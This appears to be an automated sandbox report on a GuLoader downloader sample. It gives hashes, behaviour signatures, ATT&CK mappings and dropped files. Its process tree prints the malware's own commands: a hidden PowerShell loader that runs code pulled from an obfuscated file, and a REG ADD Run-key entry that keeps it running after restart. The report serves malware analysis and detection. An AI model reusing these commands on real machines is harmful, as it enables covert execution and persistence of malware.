Overview

overview

10

Static

static

3

6b2874507f...03.exe

windows7-x64

7

6b2874507f...03.exe

windows10-2004-x64

10

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-04-2024 01:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603.exe

  • Size

    549KB

  • MD5

    4621fea50e1982e6f753efe7d1be2b35

  • SHA1

    46072b07bfa96583ed03149a04411cbcf04eadf9

  • SHA256

    6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603

  • SHA512

    301e380d9e207caa7e994b251e2018207851a32f0c1850b3de669742c9d640d5254640d972e0143bc99e8cb2e3728bb7878814e66498928ff777d26c9bd206f5

  • SSDEEP

    12288:8stfWr2zXogHMSwOdJ1JUTrNuVwik2Mx/DvMAM++:8st+r2zXZ/dJyrNuuik2yDc++

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
    installer
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603.exe
    "C:\Users\Admin\AppData\Local\Temp\6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:228
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3272
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        3⤵
          PID:5024
        • C:\Users\Admin\AppData\Local\Temp\Overfondle.exe
          "C:\Users\Admin\AppData\Local\Temp\Overfondle.exe"
          3⤵
          • Checks computer location settings
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4056
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:5024
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4072 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:3176

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37
        Filesize

        73KB

        MD5

        2a4d239948b7ba6c05b6dc3d6a4bd41d

        SHA1

        ce9c6d7cabfa263b0af02023beaa4938d2dba4f5

        SHA256

        490fafe9835e76b1780427bdfc6f32529d04c81630a5678c6af77b3d46a0276a

        SHA512

        d7205fd1293aba4310773546c50da78d0f9c0ff37dfc0efbcc9928666a556dca634c0ec9dbc01f70bf5cb071c547bee36a1be40ff705a55d41885fbbd1457a57

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Moviedom230\Enforcedly251\Aphthong.cal
        Filesize

        310KB

        MD5

        b5464e0d8950a57546e96bb94f6c2cf1

        SHA1

        b31d124005d806419adfb7f2f055f959c406b97a

        SHA256

        795e6773d208f28d17ae68b6a0d793a568b306764666702bb9591faf0fb85ec2

        SHA512

        f10bc9334f3b4afa3d58ad7f87d0c6874dcacb3b2eabc1f5ae047ae786fe4c7c0e79ee7fd44640202ab0cb0e244e67bc038a3f2173a729feed3090f8e6d9f3ec

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Overfondle.exe
        Filesize

        549KB

        MD5

        4621fea50e1982e6f753efe7d1be2b35

        SHA1

        46072b07bfa96583ed03149a04411cbcf04eadf9

        SHA256

        6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603

        SHA512

        301e380d9e207caa7e994b251e2018207851a32f0c1850b3de669742c9d640d5254640d972e0143bc99e8cb2e3728bb7878814e66498928ff777d26c9bd206f5

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4vutyct.4y2.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\nsv684.tmp\nsExec.dll
        Filesize

        6KB

        MD5

        5aa38904acdcc21a2fb8a1d30a72d92f

        SHA1

        a9ce7d1456698921791db91347dba0489918d70c

        SHA256

        10675f13abaee592f14382349aa35d82fb52aab4e27eef61d0c83dec1f6b73da

        SHA512

        f04740da561d7cd0dea5e839c9e1c339d4a3e63944d3566c94c921a3d170a69918a32dff3f3b43f13d55cc25a2dbb4c21104f062c324308ac5104179766402a3

        Download Submit
      • memory/3272-27-0x0000000006310000-0x000000000632E000-memory.dmp
        Filesize

        120KB

        Download
      • memory/3272-40-0x0000000073F70000-0x0000000074720000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/3272-16-0x0000000005C50000-0x0000000005CB6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3272-14-0x00000000052A0000-0x00000000052C2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3272-22-0x0000000005D00000-0x0000000006054000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/3272-13-0x0000000005620000-0x0000000005C48000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/3272-28-0x0000000006410000-0x000000000645C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/3272-29-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3272-31-0x0000000006810000-0x000000000682A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/3272-30-0x00000000072B0000-0x0000000007346000-memory.dmp
        Filesize

        600KB

        Download
      • memory/3272-32-0x0000000006860000-0x0000000006882000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3272-33-0x0000000007970000-0x0000000007F14000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/3272-12-0x0000000002C80000-0x0000000002CB6000-memory.dmp
        Filesize

        216KB

        Download
      • memory/3272-35-0x00000000085A0000-0x0000000008C1A000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/3272-37-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3272-11-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3272-39-0x0000000007840000-0x0000000007844000-memory.dmp
        Filesize

        16KB

        Download
      • memory/3272-15-0x0000000005340000-0x00000000053A6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3272-41-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3272-43-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3272-44-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3272-45-0x0000000008C20000-0x000000000B7EC000-memory.dmp
        Filesize

        43.8MB

        Download
      • memory/3272-46-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3272-47-0x0000000008C20000-0x000000000B7EC000-memory.dmp
        Filesize

        43.8MB

        Download
      • memory/3272-48-0x0000000008C20000-0x000000000B7EC000-memory.dmp
        Filesize

        43.8MB

        Download
      • memory/3272-49-0x00000000779D1000-0x0000000077AF1000-memory.dmp
        Filesize

        1.1MB

        Download
      • memory/3272-10-0x0000000073F70000-0x0000000074720000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/3272-69-0x0000000008C20000-0x000000000B7EC000-memory.dmp
        Filesize

        43.8MB

        Download
      • memory/3272-68-0x0000000073F70000-0x0000000074720000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/4816-54-0x0000000077A58000-0x0000000077A59000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4816-55-0x00000000779D1000-0x0000000077AF1000-memory.dmp
        Filesize

        1.1MB

        Download
      • memory/4816-56-0x0000000000400000-0x0000000001654000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/4816-57-0x0000000001660000-0x000000000422C000-memory.dmp
        Filesize

        43.8MB

        Download
      • memory/4816-53-0x0000000001660000-0x000000000422C000-memory.dmp
        Filesize

        43.8MB

        Download
      • memory/4816-52-0x0000000000400000-0x0000000001654000-memory.dmp
        Filesize

        18.3MB

        Download